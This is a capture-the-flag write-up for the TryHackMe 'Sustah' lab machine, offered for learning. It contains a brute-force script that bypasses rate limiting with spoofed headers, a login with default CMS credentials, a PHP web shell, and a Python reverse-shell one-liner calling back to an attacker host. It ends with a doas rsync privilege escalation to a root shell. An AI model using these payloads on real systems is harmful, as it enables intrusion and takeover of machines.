Sustah tryhackme Writeup
Sustah tryhackme Writeup (Medium)
Enumeration (NMAP, Services)
nmap -sC -sV 10.10.153.95
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-16 19:29 EDT
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 19:30 (0:00:12 remaining)
Nmap scan report for 10.10.153.95
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)
| 256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)
|_ 256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Susta
8085/tcp open http Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Spinner
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds
As we can see there is three ports open currently, lets review the services running on these ports.
22 is running OpenSSH 7.2p2
80 is running Apache HTTPD
8085 is running Gunicorn Python web server
Gunicorn web server enumeration
Navigating to http://10.10.153.95:8085/ we see the following.
It seems we have to guess a number and we get some sort of output that is a "reward" but if that number is wrong than we get an error.
I intercepted the request using Burp Suite and sent it to the intruder so we can brute-force this number.
After doing the stuff I have done above click start attack.
Bypassing rate limiting
There seems to be a rate limit, we have to bypass this rate limit else we cannot brute-force the lucky number. We can try some common headers E.g.
X-Fowarded-For X-Fowarded-IP X-Fowarded-Host
I am going to do this in Python, we will use the requests module so we can set headers and try to bypass the rate limit.
import requests
import random
import sys
url = "http://10.10.252.25:8085/"
for i in range(100000):
headers = {
"X-Remote-IP":"127.0.0.1",
"X-Remote-Addr":"127.0.0.1",
"X-Fowarded-For":"127.0.0.1",
"X-Forwarded-IP":"127.0.0.1",
"X-Host":"127.0.0.1",
"X-Forwarded-Host":"127.0.0.1",
}
obj = {'number':i}
req = requests.post(url, data=obj, headers=headers)
if("Oh no! How unlucky. Spin the wheel and try again." not in req.text):
print("{} is the lucky number!",i)
sys.exit()
I know its messy, I didn't use any kind of IDE and I wrote it quite early in the morning.
Now we have the code, lets enter the code into the "Input" text box. We get given a path.
I tried going to the path but got an error, lets try on the Apache HTTP Server.
Apache HTTP Enumeration
Navigate to 10.10.153.95/YouGotTh3P@th This is running Mara CMS, we can try logging in using default credentials. Navigate to the following URL. 10.10.153.95/YouGotTh3P@th/?login
Username:admin
password:changeme
The default credential's worked and we are logged in as an administrator.
Googling "MaraCMS" we see an RCE on exploit-db.
Read exploit-db.com/exploits/48780 which explains in detail how the RCE works, its pretty basic firstly go to /YouGotTh3P@th/codebase/dir.php?type=filenew now create a PHP File called shell.php and add the following code into the PHP File.
'<?php system($_GET["cmd"]) ?>'
Now we need to upload this file onto the server.
curl -X POST 10.10.153.95/YouGotTh3P@th/img/shell.php?cm..
Or navigate to the following URL
Now lets get a reverse shell on the box, we have RCE.
- 10.10.153.95/YouGotTh3P@th/img/shell.php?cm.. -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",$PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
After some time of enumerating I checked the /opt directory which contained nothing we couldn't get the user flag as it was owned by Kiran and not readable for us, I continued to check /var/backups
cd /var/backups
ls -al
ls -al
total 636
drwxr-xr-x 2 root root 4096 Dec 9 2020 .
drwxr-xr-x 14 root root 4096 Dec 6 2020 ..
-r--r--r-- 1 root root 1722 Dec 6 2020 .bak.passwd
-rw-r--r-- 1 root root 51200 Dec 6 2020 alternatives.tar.0
-rw-r--r-- 1 root root 6308 Dec 9 2020 apt.extended_states.0
-rw-r--r-- 1 root root 715 Dec 6 2020 apt.extended_states.1.gz
-rw-r--r-- 1 root root 509 Nov 12 2020 dpkg.diversions.0
-rw-r--r-- 1 root root 207 Dec 6 2020 dpkg.statoverride.0
-rw-r--r-- 1 root root 547201 Dec 6 2020 dpkg.status.0
-rw------- 1 root root 849 Dec 6 2020 group.bak
-rw------- 1 root shadow 714 Dec 6 2020 gshadow.bak
-rw------- 1 root root 1695 Dec 6 2020 passwd.bak
-rw------- 1 root shadow 1031 Dec 6 2020 shadow.bak
As we can see, we are able to read ".bak.passwd" which the actual file is "passwd.bak" I thought this was suspicious and decided to cat the file contents.
- cat .bak.passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
kiran:x:1002:1002:trythispasswordforuserkiran:/home/kiran:
Possible credentials below
Username:Kiran
Password:trythispasswordforuserkiran
That worked! Ez pwn
I navigated to /home/kiran and read the "user.txt"
Now I am going to get linpeas.sh on the box which is an easy way to enumerate for priv esc.
Awesome!
Inside of the "doas" configuration file it shows we can run the "rsync" binary as root with no password, this is a possible priv esc.
- doas rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
Done. We've rooted the machine, it was a fun one! I hope you've enjoyed and learned something today.
Feel free to follow our Twitter